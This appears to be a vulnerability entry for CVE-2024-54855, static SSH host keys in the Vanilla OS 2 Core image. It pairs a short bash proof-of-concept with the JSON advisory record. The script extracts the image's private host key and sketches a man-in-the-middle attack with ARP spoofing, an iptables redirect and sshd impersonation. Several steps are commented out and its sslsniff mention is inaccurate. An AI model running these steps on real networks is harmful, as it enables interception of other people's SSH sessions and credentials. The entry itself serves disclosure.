CVE-2024-54855

#!/bin/bash # CVE-2024-54855 PoC - Vanilla OS 2 Static SSH Key Exploitation # This PoC demonstrates extracting and using static SSH keys for MITM attacks # Step 1: Extract static SSH host keys from Vanilla OS 2 Core image # Assuming image is mounted at /mnt/vanilla-image SSH_KEY_PATH="/mnt/vanilla-image/etc/ssh/ssh_host_rsa_key" SSH_KEY_PUB="/mnt/vanilla-image/etc/ssh/ssh_host_rsa_key.pub" # Step 2: Copy static private key to attacker machine cp "$SSH_KEY_PATH" /tmp/vanilla_static_key chmod 600 /tmp/vanilla_static_key # Step 3: Perform MITM attack using arpspoof and sslsniff echo "[+] Starting MITM attack with static SSH key..." # Enable IP forwarding echo 1 > /proc/sys/net/ipv4/ip_forward # Perform ARP spoofing (requires arpspoof tool) # arpspoof -i eth0 -t TARGET_IP GATEWAY_IP & # Step 4: Redirect SSH traffic through attacker # iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222 # Step 5: Use SSH honeypot with static key to intercept connections # sshd -h /tmp/vanilla_static_key -p 2222 echo "[!] Static SSH key successfully extracted and ready for MITM" echo "[!] Any client connecting to affected Vanilla OS systems is vulnerable"

{"cve": {"id": "CVE-2024-54855", "sourceIdentifier": "[email protected]", "published": "2026-01-13T16:15:54.730", "lastModified": "2026-02-10T18:36:03.913", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "fabricators Ltd Vanilla OS 2 Core image v1.1.0 was discovered to contain static keys for the SSH service, allowing attackers to possibly execute a man-in-the-middle attack during connections with other hosts."}, {"lang": "es", "value": "La imagen v1.1.0 de fabricators Ltd Vanilla OS 2 Core se descubrió que contenía claves estáticas para el servicio SSH, lo que podría permitir a los atacantes ejecutar un ataque man-in-the-middle durante las conexiones con otros hosts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.5}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabricators:vanilla_os_core_image:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.1", "matchCriteriaId": "B6D4D040-6875-460D-B760-8B51D1060EEA"}]}]}], "references": [{"url": "http://fabricators.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "http://vanilla.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/Vanilla-OS/core-image/security/advisories/GHSA-67pc-hqr2-g34h", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}